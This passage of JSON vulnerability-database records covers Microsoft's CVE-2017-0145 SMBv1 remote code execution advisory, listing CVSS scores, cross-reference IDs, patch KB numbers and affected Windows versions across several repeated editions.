"obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-17T02:51:36", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
"MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4014077", "KB4012213", "KB3210721", "KB3177186", "KB3205401", "KB4012215", "KB3210720", "KB4012216", "KB4013198", "KB4012214", "KB4013429", "KB3205409", "KB3212646", "KB4012212", "KB4012606", "KB3213986", "KBMS16-110, 3187754", "KB4012598", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": 
"Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", 
"kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core 
installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", 
"msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T02:51:36", "differentElements": ["msAffectedSoftware"], "edition": 49}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": 
{"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-17T04:46:25", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": 
["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB3210721", "KB4012214", "KB3205401", "KB3210720", "KB4012212", "KB4012213", "KB4013198", "KB4012216", "KB3212646", "KB4012598", "KB4012215", "KB4014077", "KB3177186", "KB4012606", "KB3213986", "KB3205409", "KB4013429", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", 
"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 
2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, 
{"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T04:46:25", "differentElements": ["msAffectedSoftware"], "edition": 50}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-17T10:52:46", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", 
"MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 